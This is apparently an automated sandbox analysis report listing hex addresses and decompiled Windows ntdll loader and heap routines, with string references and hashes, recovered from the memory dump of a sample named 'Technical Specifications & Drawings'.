                                                  0x01811859
                                                  0x0181185c
                                                  0x00000000
                                                  0x00000000
                                                  0x01811851
                                                  0x01811853
                                                  0x01811855
                                                  0x01811865
                                                  0x01811865
                                                  0x01811866
                                                  0x01811868
                                                  0x01811870
                                                  0x00000000
                                                  0x01811870
                                                  0x01811857
                                                  0x01811857
                                                  0x0181185e
                                                  0x00000000
                                                  0x018116d2
                                                  0x018116d2
                                                  0x018116d5
                                                  0x018116d5
                                                  0x018116d8
                                                  0x018116da
                                                  0x018116dd
                                                  0x018116e0
                                                  0x018116e3
                                                  0x018116e5
                                                  0x01811808
                                                  0x01811808
                                                  0x01811809
                                                  0x01811812
                                                  0x01811817
                                                  0x01811817
                                                  0x00000000
                                                  0x01811817
                                                  0x018116eb
                                                  0x018116ed
                                                  0x00000000
                                                  0x00000000
                                                  0x018116f6
                                                  0x018116f9
                                                  0x018116ff
                                                  0x01811701
                                                  0x0181172c
                                                  0x0181172c
                                                  0x0181172f
                                                  0x01811732
                                                  0x01811734
                                                  0x01811737
                                                  0x0181173b
                                                  0x0181175e
                                                  0x0181175e
                                                  0x01811761
                                                  0x01811764
                                                  0x0181176d
                                                  0x01811774
                                                  0x01811777
                                                  0x0181177a
                                                  0x0181177c
                                                  0x0181177f
                                                  0x01811781
                                                  0x01811781
                                                  0x01811784
                                                  0x01811784
                                                  0x0181177f
                                                  0x0181178c
                                                  0x01811791
                                                  0x01811796
                                                  0x01811799
                                                  0x0181179c
                                                  0x0181179e
                                                  0x018117a5
                                                  0x018117a9
                                                  0x018117c9
                                                  0x018117ce
                                                  0x018117ab
                                                  0x018117c1
                                                  0x018117c6
                                                  0x018117dc
                                                  0x018117e3
                                                  0x018117e8
                                                  0x018117ee
                                                  0x018117f1
                                                  0x018117f5
                                                  0x018117f7
                                                  0x018117fe
                                                  0x018117ff
                                                  0x018117ff
                                                  0x018117f5
                                                  0x0181179c
                                                  0x00000000
                                                  0x01811764
                                                  0x01811741
                                                  0x01811746
                                                  0x01811748
                                                  0x00000000
                                                  0x00000000
                                                  0x01811754
                                                  0x00000000
                                                  0x01811754
                                                  0x01811703
                                                  0x01811710
                                                  0x01811710
                                                  0x01811713
                                                  0x00000000
                                                  0x00000000
                                                  0x01811708
                                                  0x0181170a
                                                  0x0181170c
                                                  0x0181171c
                                                  0x0181171c
                                                  0x0181171d
                                                  0x0181171f
                                                  0x01811727
                                                  0x00000000
                                                  0x01811727
                                                  0x0181170e
                                                  0x0181170e
                                                  0x01811715
                                                  0x00000000
                                                  0x01811715
                                                  0x018116cc
                                                  0x017c9a45
                                                  0x017c9a45
                                                  0x017c9a0e
                                                  0x017c9a1c
                                                  0x017c9a23
                                                  0x0181167e
                                                  0x0181167f
                                                  0x01811681
                                                  0x01811683
                                                  0x01811684
                                                  0x00000000
                                                  0x01811684
                                                  0x00000000
                                                  0x017c9aad
                                                  0x017c9aad
                                                  0x017c9ab0
                                                  0x017c9ab3
                                                  0x017c9ab3
                                                  0x017c9ab6
                                                  0x00000000
                                                  0x00000000
                                                  0x017c9ab8
                                                  0x017c9aba
                                                  0x017c9abc
                                                  0x017c9ac8
                                                  0x017c9ac8
                                                  0x00000000
                                                  0x017c9abe
                                                  0x017c9abe
                                                  0x017c9ac0
                                                  0x00000000
                                                  0x017c9ac0
                                                  0x017c9abc
                                                  0x017c9ad2
                                                  0x00000000
                                                  0x017c9ad2
                                                  0x017c9aab

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: c3393fc6e18316fa3a8867a44bca0fb73a5f50cd6231c0f7800ecb57ec8e8110
                                                  • Instruction ID: b5eb0983ab44efeaac6e35a9fc8558600bbfa280b299f55960f74cda0951db8f
                                                  • Opcode Fuzzy Hash: c3393fc6e18316fa3a8867a44bca0fb73a5f50cd6231c0f7800ecb57ec8e8110
                                                  • Instruction Fuzzy Hash: 5F22D1716002469FEB25DF2CC498B7AFBA9EF44704F28855DEA46CB349E731DA81CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 83%
                                                  			E017B8794(void* __ecx) {
                                                  				signed int _v0;
                                                  				char _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				signed int _v20;
                                                  				intOrPtr _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				signed int _v40;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				intOrPtr* _t77;
                                                  				signed int _t80;
                                                  				signed char _t81;
                                                  				signed int _t87;
                                                  				signed int _t91;
                                                  				void* _t92;
                                                  				void* _t94;
                                                  				signed int _t95;
                                                  				signed int _t103;
                                                  				signed int _t105;
                                                  				signed int _t110;
                                                  				signed int _t118;
                                                  				intOrPtr* _t121;
                                                  				intOrPtr _t122;
                                                  				signed int _t125;
                                                  				signed int _t129;
                                                  				signed int _t131;
                                                  				signed int _t134;
                                                  				signed int _t136;
                                                  				signed int _t143;
                                                  				signed int* _t147;
                                                  				signed int _t151;
                                                  				void* _t153;
                                                  				signed int* _t157;
                                                  				signed int _t159;
                                                  				signed int _t161;
                                                  				signed int _t166;
                                                  				signed int _t168;
                                                  
                                                  				_push(__ecx);
                                                  				_t153 = __ecx;
                                                  				_t159 = 0;
                                                  				_t121 = __ecx + 0x3c;
                                                  				if( *_t121 == 0) {
                                                  					L2:
                                                  					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                  					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                  						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                  						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                  						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                  							L6:
                                                  							if(E017B934A() != 0) {
                                                  								_t159 = E0182A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                  								__eflags = _t159;
                                                  								if(_t159 < 0) {
                                                  									_t81 =  *0x1895780; // 0x0
                                                  									__eflags = _t81 & 0x00000003;
                                                  									if((_t81 & 0x00000003) != 0) {
                                                  										_push(_t159);
                                                  										E01825510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                  										_t81 =  *0x1895780; // 0x0
                                                  									}
                                                  									__eflags = _t81 & 0x00000010;
                                                  									if((_t81 & 0x00000010) != 0) {
                                                  										asm("int3");
                                                  									}
                                                  								}
                                                  							}
                                                  						} else {
                                                  							_t159 = E017B849B(0, _t122, _t153, _t159, _t180);
                                                  							if(_t159 >= 0) {
                                                  								goto L6;
                                                  							}
                                                  						}
                                                  						_t80 = _t159;
                                                  						goto L8;
                                                  					} else {
                                                  						_t125 = 0x13;
                                                  						asm("int 0x29");
                                                  						_push(0);
                                                  						_push(_t159);
                                                  						_t161 = _t125;
                                                  						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                  						_t143 = 0;
                                                  						_v40 = _t161;
                                                  						_t118 = 0;
                                                  						_push(_t153);
                                                  						__eflags = _t87;
                                                  						if(_t87 != 0) {
                                                  							_t118 = _t87 + 0x5d8;
                                                  							__eflags = _t118;
                                                  							if(_t118 == 0) {
                                                  								L46:
                                                  								_t118 = 0;
                                                  							} else {
                                                  								__eflags =  *(_t118 + 0x30);
                                                  								if( *(_t118 + 0x30) == 0) {
                                                  									goto L46;
                                                  								}
                                                  							}
                                                  						}
                                                  						_v32 = 0;
                                                  						_v28 = 0;
                                                  						_v16 = 0;
                                                  						_v20 = 0;
                                                  						_v12 = 0;
                                                  						__eflags = _t118;
                                                  						if(_t118 != 0) {
                                                  							__eflags = _t161;
                                                  							if(_t161 != 0) {
                                                  								__eflags =  *(_t118 + 8);
                                                  								if( *(_t118 + 8) == 0) {
                                                  									L22:
                                                  									_t143 = 1;
                                                  									__eflags = 1;
                                                  								} else {
                                                  									_t19 = _t118 + 0x40; // 0x40
                                                  									_t156 = _t19;
                                                  									E017B8999(_t19,  &_v16);
                                                  									__eflags = _v0;
                                                  									if(_v0 != 0) {
                                                  										__eflags = _v0 - 1;
                                                  										if(_v0 != 1) {
                                                  											goto L22;
                                                  										} else {
                                                  											_t128 =  *(_t161 + 0x64);
                                                  											__eflags =  *(_t161 + 0x64);
                                                  											if( *(_t161 + 0x64) == 0) {
                                                  												goto L22;
                                                  											} else {
                                                  												E017B8999(_t128,  &_v12);
                                                  												_t147 = _v12;
                                                  												_t91 = 0;
                                                  												__eflags = 0;
                                                  												_t129 =  *_t147;
                                                  												while(1) {
                                                  													__eflags =  *((intOrPtr*)(0x1895c60 + _t91 * 8)) - _t129;
                                                  													if( *((intOrPtr*)(0x1895c60 + _t91 * 8)) == _t129) {
                                                  														break;
                                                  													}
                                                  													_t91 = _t91 + 1;
                                                  													__eflags = _t91 - 5;
                                                  													if(_t91 < 5) {
                                                  														continue;
                                                  													} else {
                                                  														_t131 = 0;
                                                  														__eflags = 0;
                                                  													}
                                                  													L37:
                                                  													__eflags = _t131;
                                                  													if(_t131 != 0) {
                                                  														goto L22;
                                                  													} else {
                                                  														__eflags = _v16 - _t147;
                                                  														if(_v16 != _t147) {
                                                  															goto L22;
                                                  														} else {
                                                  															E017C2280(_t92, 0x18986cc);
                                                  															_t94 = E01879DFB( &_v20);
                                                  															__eflags = _t94 - 1;
                                                  															if(_t94 != 1) {
                                                  															}
                                                  															asm("movsd");
                                                  															asm("movsd");
                                                  															asm("movsd");
                                                  															asm("movsd");
                                                  															 *_t118 =  *_t118 + 1;
                                                  															asm("adc dword [ebx+0x4], 0x0");
                                                  															_t95 = E017D61A0( &_v32);
                                                  															__eflags = _t95;
                                                  															if(_t95 != 0) {
                                                  																__eflags = _v32 | _v28;
                                                  																if((_v32 | _v28) != 0) {
                                                  																	_t71 = _t118 + 0x40; // 0x3f
                                                  																	_t134 = _t71;
                                                  																	goto L55;
                                                  																}
                                                  															}
                                                  															goto L30;
                                                  														}
                                                  													}
                                                  													goto L56;
                                                  												}
                                                  												_t92 = 0x1895c64 + _t91 * 8;
                                                  												asm("lock xadd [eax], ecx");
                                                  												_t131 = (_t129 | 0xffffffff) - 1;
                                                  												goto L37;
                                                  											}
                                                  										}
                                                  										goto L56;
                                                  									} else {
                                                  										_t143 = E017B8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                  										__eflags = _t143;
                                                  										if(_t143 != 0) {
                                                  											_t157 = _v12;
                                                  											_t103 = 0;
                                                  											__eflags = 0;
                                                  											_t136 =  &(_t157[1]);
                                                  											 *(_t161 + 0x64) = _t136;
                                                  											_t151 =  *_t157;
                                                  											_v20 = _t136;
                                                  											while(1) {
                                                  												__eflags =  *((intOrPtr*)(0x1895c60 + _t103 * 8)) - _t151;
                                                  												if( *((intOrPtr*)(0x1895c60 + _t103 * 8)) == _t151) {
                                                  													break;
                                                  												}
                                                  												_t103 = _t103 + 1;
                                                  												__eflags = _t103 - 5;
                                                  												if(_t103 < 5) {
                                                  													continue;
                                                  												}
                                                  												L21:
                                                  												_t105 = E017EF380(_t136, 0x1781184, 0x10);
                                                  												__eflags = _t105;
                                                  												if(_t105 != 0) {
                                                  													__eflags =  *_t157 -  *_v16;
                                                  													if( *_t157 >=  *_v16) {
                                                  														goto L22;
                                                  													} else {
                                                  														asm("cdq");
                                                  														_t166 = _t157[5] & 0x0000ffff;
                                                  														_t108 = _t157[5] & 0x0000ffff;
                                                  														asm("cdq");
                                                  														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                  														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                  														if(__eflags > 0) {
                                                  															L29:
                                                  															E017C2280(_t108, 0x18986cc);
                                                  															 *_t118 =  *_t118 + 1;
                                                  															_t42 = _t118 + 0x40; // 0x3f
                                                  															_t156 = _t42;
                                                  															asm("adc dword [ebx+0x4], 0x0");
                                                  															asm("movsd");
                                                  															asm("movsd");
                                                  															asm("movsd");
                                                  															asm("movsd");
                                                  															_t110 = E017D61A0( &_v32);
                                                  															__eflags = _t110;
                                                  															if(_t110 != 0) {
                                                  																__eflags = _v32 | _v28;
                                                  																if((_v32 | _v28) != 0) {
                                                  																	_t134 = _v20;
                                                  																	L55:
                                                  																	E01879D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                  																}
                                                  															}
                                                  															L30:
                                                  															 *_t118 =  *_t118 + 1;
                                                  															asm("adc dword [ebx+0x4], 0x0");
                                                  															E017BFFB0(_t118, _t156, 0x18986cc);
                                                  															goto L22;
                                                  														} else {
                                                  															if(__eflags < 0) {
                                                  																goto L22;
                                                  															} else {
                                                  																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                  																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                  																	goto L22;
                                                  																} else {
                                                  																	goto L29;
                                                  																}
                                                  															}
                                                  														}
                                                  													}
                                                  													goto L56;
                                                  												}
                                                  												goto L22;
                                                  											}
                                                  											asm("lock inc dword [eax]");
                                                  											goto L21;
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  						return _t143;
                                                  					}
                                                  				} else {
                                                  					_push( &_v8);
                                                  					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                  					_push(__ecx + 0x40);
                                                  					_push(_t121);
                                                  					_push(0xffffffff);
                                                  					_t80 = E017E9A00();
                                                  					_t159 = _t80;
                                                  					if(_t159 < 0) {
                                                  						L8:
                                                  						return _t80;
                                                  					} else {
                                                  						goto L2;
                                                  					}
                                                  				}
                                                  				L56:
                                                  			}












































                                                  0x017b87ae
                                                  0x017b87b4
                                                  0x017b87b5
                                                  0x017b87b6
                                                  0x017b87b8
                                                  0x017b87bd
                                                  0x017b87c1
                                                  0x017b87f4
                                                  0x017b87fa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017b87c1
                                                  0x00000000

                                                  Strings
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01809C28
                                                  • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01809C18
                                                  • LdrpDoPostSnapWork, xrefs: 01809C1E
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 2994545307-1948996284
                                                  • Opcode ID: fe15fed0abe96d0654943ff480ee95cbe9123c506fb323a39fc4e5acb961cd4a
                                                  • Instruction ID: 970064ee97e3d540748acea143643db175bdbcda45880d071822ab351c6f27b9
                                                  • Opcode Fuzzy Hash: fe15fed0abe96d0654943ff480ee95cbe9123c506fb323a39fc4e5acb961cd4a
                                                  • Instruction Fuzzy Hash: E991E271A1021ADBDF19DF59D8C0AEAF7B9FF44318B054169EA05AB245DB30EA01CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 80%
                                                  			E017DAC7B(void* __ecx, signed short* __edx) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				void* __ebx;
                                                  				signed char _t75;
                                                  				signed int _t79;
                                                  				signed int _t88;
                                                  				intOrPtr _t89;
                                                  				signed int _t96;
                                                  				signed char* _t97;
                                                  				intOrPtr _t98;
                                                  				signed int _t101;
                                                  				signed char* _t102;
                                                  				intOrPtr _t103;
                                                  				signed int _t105;
                                                  				signed char* _t106;
                                                  				signed int _t131;
                                                  				signed int _t138;
                                                  				void* _t149;
                                                  				signed short* _t150;
                                                  
                                                  				_t150 = __edx;
                                                  				_t149 = __ecx;
                                                  				_t70 =  *__edx & 0x0000ffff;
                                                  				__edx[1] = __edx[1] & 0x000000f8;
                                                  				__edx[3] = 0;
                                                  				_v8 =  *__edx & 0x0000ffff;
                                                  				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                                                  					_t39 =  &(_t150[8]); // 0x8
                                                  					E017FD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                                                  					__edx[1] = __edx[1] | 0x00000004;
                                                  				}
                                                  				_t75 =  *(_t149 + 0xcc) ^  *0x1898a68;
                                                  				if(_t75 != 0) {
                                                  					L4:
                                                  					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                                  						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                                                  						_t79 =  *(_t149 + 0x50);
                                                  						 *_t150 =  *_t150 ^ _t79;
                                                  						return _t79;
                                                  					}
                                                  					return _t75;
                                                  				} else {
                                                  					_t9 =  &(_t150[0x80f]); // 0x1017
                                                  					_t138 = _t9 & 0xfffff000;
                                                  					_t10 =  &(_t150[0x14]); // 0x20
                                                  					_v12 = _t138;
                                                  					if(_t138 == _t10) {
                                                  						_t138 = _t138 + 0x1000;
                                                  						_v12 = _t138;
                                                  					}
                                                  					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                                                  					if(_t75 > _t138) {
                                                  						_v8 = _t75 - _t138;
                                                  						_push(0x4000);
                                                  						_push( &_v8);
                                                  						_push( &_v12);
                                                  						_push(0xffffffff);
                                                  						_t131 = E017E96E0();
                                                  						__eflags = _t131 - 0xc0000045;
                                                  						if(_t131 == 0xc0000045) {
                                                  							_t88 = E01853C60(_v12, _v8);
                                                  							__eflags = _t88;
                                                  							if(_t88 != 0) {
                                                  								_push(0x4000);
                                                  								_push( &_v8);
                                                  								_push( &_v12);
                                                  								_push(0xffffffff);
                                                  								_t131 = E017E96E0();
                                                  							}
                                                  						}
                                                  						_t89 =  *[fs:0x30];
                                                  						__eflags = _t131;
                                                  						if(_t131 < 0) {
                                                  							__eflags =  *(_t89 + 0xc);
                                                  							if( *(_t89 + 0xc) == 0) {
                                                  								_push("HEAP: ");
                                                  								E017AB150();
                                                  							} else {
                                                  								E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  							}
                                                  							_push(_v8);
                                                  							_push(_v12);
                                                  							_push(_t149);
                                                  							_t75 = E017AB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                                                  							goto L4;
                                                  						} else {
                                                  							_t96 =  *(_t89 + 0x50);
                                                  							_t132 = 0x7ffe0380;
                                                  							__eflags = _t96;
                                                  							if(_t96 != 0) {
                                                  								__eflags =  *_t96;
                                                  								if( *_t96 == 0) {
                                                  									goto L10;
                                                  								}
                                                  								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                  								L11:
                                                  								__eflags =  *_t97;
                                                  								if( *_t97 != 0) {
                                                  									_t98 =  *[fs:0x30];
                                                  									__eflags =  *(_t98 + 0x240) & 0x00000001;
                                                  									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                                                  										E018614FB(_t132, _t149, _v12, _v8, 7);
                                                  									}
                                                  								}
                                                  								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                                                  								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                                                  								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                                                  								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                                                  								_t101 =  *( *[fs:0x30] + 0x50);
                                                  								__eflags = _t101;
                                                  								if(_t101 != 0) {
                                                  									__eflags =  *_t101;
                                                  									if( *_t101 == 0) {
                                                  										goto L13;
                                                  									}
                                                  									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                  									goto L14;
                                                  								} else {
                                                  									L13:
                                                  									_t102 = _t132;
                                                  									L14:
                                                  									__eflags =  *_t102;
                                                  									if( *_t102 != 0) {
                                                  										_t103 =  *[fs:0x30];
                                                  										__eflags =  *(_t103 + 0x240) & 0x00000001;
                                                  										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                                                  											__eflags = E017C7D50();
                                                  											if(__eflags != 0) {
                                                  												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                  												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                                                  											}
                                                  											E01861411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                                                  										}
                                                  									}
                                                  									_t133 = 0x7ffe038a;
                                                  									_t105 =  *( *[fs:0x30] + 0x50);
                                                  									__eflags = _t105;
                                                  									if(_t105 != 0) {
                                                  										__eflags =  *_t105;
                                                  										if( *_t105 == 0) {
                                                  											goto L16;
                                                  										}
                                                  										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                  										goto L17;
                                                  									} else {
                                                  										L16:
                                                  										_t106 = _t133;
                                                  										L17:
                                                  										__eflags =  *_t106;
                                                  										if( *_t106 != 0) {
                                                  											__eflags = E017C7D50();
                                                  											if(__eflags != 0) {
                                                  												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                  												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                                                  											}
                                                  											E01861411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                                                  										}
                                                  										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                                                  										_t150[1] = _t75;
                                                  										goto L4;
                                                  									}
                                                  								}
                                                  							}
                                                  							L10:
                                                  							_t97 = _t132;
                                                  							goto L11;
                                                  						}
                                                  					} else {
                                                  						goto L4;
                                                  					}
                                                  				}
                                                  			}

                                                  Strings
                                                  • HEAP: , xrefs: 0181A0BA
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0181A0CD
                                                  • HEAP[%wZ]: , xrefs: 0181A0AD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  • Opcode ID: fdadf2b47c6cd4e6b0f3fa5c06ab3d79740afc6086b4ab312e2d5da87f80c75a
                                                  • Instruction ID: 4437fbcbc640fd2e2e4b5b1981a7f5fed137e1399cbc89a043951712088469a2
                                                  • Opcode Fuzzy Hash: fdadf2b47c6cd4e6b0f3fa5c06ab3d79740afc6086b4ab312e2d5da87f80c75a
                                                  • Instruction Fuzzy Hash: AA81F372600688EFE726CBACC898BA9FBF8FF04714F0445A5E541C7296D774EA80CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E017CB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __ebp;
                                                  				void* _t72;
                                                  				char _t76;
                                                  				signed char _t77;
                                                  				intOrPtr* _t80;
                                                  				unsigned int _t85;
                                                  				signed int* _t86;
                                                  				signed int _t88;
                                                  				signed char _t89;
                                                  				intOrPtr _t90;
                                                  				intOrPtr _t101;
                                                  				intOrPtr* _t111;
                                                  				void* _t117;
                                                  				intOrPtr* _t118;
                                                  				signed int _t120;
                                                  				signed char _t121;
                                                  				intOrPtr* _t123;
                                                  				signed int _t126;
                                                  				intOrPtr _t136;
                                                  				signed int _t139;
                                                  				void* _t140;
                                                  				signed int _t141;
                                                  				void* _t147;
                                                  
                                                  				_t111 = _a4;
                                                  				_t140 = __ecx;
                                                  				_v8 = __edx;
                                                  				_t3 = _t111 + 0x18; // 0x0
                                                  				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                                                  				_t5 = _t111 - 8; // -32
                                                  				_t141 = _t5;
                                                  				 *(_t111 + 0x14) = _a8;
                                                  				_t72 = 4;
                                                  				 *(_t141 + 2) = 1;
                                                  				 *_t141 = _t72;
                                                  				 *((char*)(_t141 + 7)) = 3;
                                                  				_t134 =  *((intOrPtr*)(__edx + 0x18));
                                                  				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                                                  					_t76 = (_t141 - __edx >> 0x10) + 1;
                                                  					_v12 = _t76;
                                                  					__eflags = _t76 - 0xfe;
                                                  					if(_t76 >= 0xfe) {
                                                  						_push(__edx);
                                                  						_push(0);
                                                  						E0186A80D(_t134, 3, _t141, __edx);
                                                  						_t76 = _v12;
                                                  					}
                                                  				} else {
                                                  					_t76 = 0;
                                                  				}
                                                  				 *((char*)(_t141 + 6)) = _t76;
                                                  				if( *0x1898748 >= 1) {
                                                  					__eflags = _a12 - _t141;
                                                  					if(_a12 <= _t141) {
                                                  						goto L4;
                                                  					}
                                                  					_t101 =  *[fs:0x30];
                                                  					__eflags =  *(_t101 + 0xc);
                                                  					if( *(_t101 + 0xc) == 0) {
                                                  						_push("HEAP: ");
                                                  						E017AB150();
                                                  					} else {
                                                  						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  					}
                                                  					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                                                  					E017AB150();
                                                  					__eflags =  *0x1897bc8;
                                                  					if(__eflags == 0) {
                                                  						E01862073(_t111, 1, _t140, __eflags);
                                                  					}
                                                  					goto L3;
                                                  				} else {
                                                  					L3:
                                                  					_t147 = _a12 - _t141;
                                                  					L4:
                                                  					if(_t147 != 0) {
                                                  						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                                                  					}
                                                  					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                                                  						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                                                  						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                                                  					}
                                                  					_t135 =  *(_t111 + 0x14);
                                                  					if( *(_t111 + 0x14) == 0) {
                                                  						L12:
                                                  						_t77 =  *((intOrPtr*)(_t141 + 6));
                                                  						if(_t77 != 0) {
                                                  							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                                                  						} else {
                                                  							_t117 = _t140;
                                                  						}
                                                  						_t118 = _t117 + 0x38;
                                                  						_t26 = _t111 + 8; // -16
                                                  						_t80 = _t26;
                                                  						_t136 =  *_t118;
                                                  						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                                                  							_push(_t118);
                                                  							_push(0);
                                                  							E0186A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                                                  						} else {
                                                  							 *_t80 = _t136;
                                                  							 *((intOrPtr*)(_t80 + 4)) = _t118;
                                                  							 *((intOrPtr*)(_t136 + 4)) = _t80;
                                                  							 *_t118 = _t80;
                                                  						}
                                                  						_t120 = _v8;
                                                  						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                                                  						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                                                  						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                                                  						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                                                  						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                                                  							__eflags =  *(_t140 + 0xb8);
                                                  							if( *(_t140 + 0xb8) == 0) {
                                                  								_t88 =  *(_t140 + 0x40) & 0x00000003;
                                                  								__eflags = _t88 - 2;
                                                  								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                                                  								__eflags =  *0x1898720 & 0x00000001;
